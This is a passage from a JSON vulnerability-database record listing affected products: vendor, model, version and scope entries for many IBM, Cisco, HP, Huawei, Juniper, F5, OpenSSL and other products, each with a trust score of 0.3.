"vendor": "ibm", "version": "7.1" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ip video phone e20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "mate products", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.19" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.13" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "junos r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.9" }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7.0" }, { "model": "srg1200\u00262200\u00263200 v100r002c02hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "56000" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "junos r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "junos 12.1x44-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.1" }, { "model": "uma v200r001c00spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "junos pulse for windows", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s6800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "flashsystem 9843-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "junos 13.1r3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3x48-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.1" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "junos 12.3r7-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "espace usm v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "junos 12.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "junos 12.1x48-d41", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nexus switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "31640" }, { "model": "fusionsphere v100r003c10spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "junos 12.1x46-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smc2.0 v100r002c01b025sp07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "espace cc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "isoc v200r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "junos 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "esight-ewl v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "icewall sso dfw certd", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ctpos 6.6r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "junos 12.1x44-d30.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.2x50-d40.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jabber im for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos d20", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "small cell factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.07" }, { "model": "flex system enterprise chassis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8724" }, { "model": "junos r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.6" }, { "model": "rational clearcase", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "spa525 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.5.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.18" }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 12.1r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "espace u2980 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "s12700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.41" }, { "model": "oceanstor s2200t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571431.43" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.11" }, { "model": "s2900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v39.7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "open source security information management", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.10" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "usg5000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.9" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "junos r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.34" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "junos 12.1x45-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.4" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "junos 13.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s5900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight v2r3c10spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "junos r1", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "s3900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyoffice emm", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2.6.0601.0090" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "junos 13.2x51-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.0" }, { "model": "system x3400m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73781.42" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x44-d45", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos d10", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "usg9500 usg9500 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2750\u0026s5700\u0026s6700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.21" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oic v100r001c00spc402", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.0" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "s7700\u0026s9700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "oceanstor s5500t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "espace u2980 v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.26" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.1r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "junos r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "system x3250m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "42521.42" }, { "model": "tivoli netcool/system service monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "junos d35", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence ip vcr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.37" }, { "model": "documentum content server sp1 p26", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "junos 12.1x44-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "junos 12.1x45-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "eupp v100r001c01spc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "junos 12.1x46-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "screenos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos 13.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ecns600 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "oceanstor s2600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v29.7" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3" }, { "model": "rational clearcase", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "sa4000 ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.2" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "10.0-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 12.2r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ave2000 v100r001c00sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.19" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "system x3620m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73761.42" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "documentum content server sp2 p15", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.4.19" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos 12.3x48-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "system x3400m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "78371.42" }, { "model": "junos 12.2r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.5" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vpn client 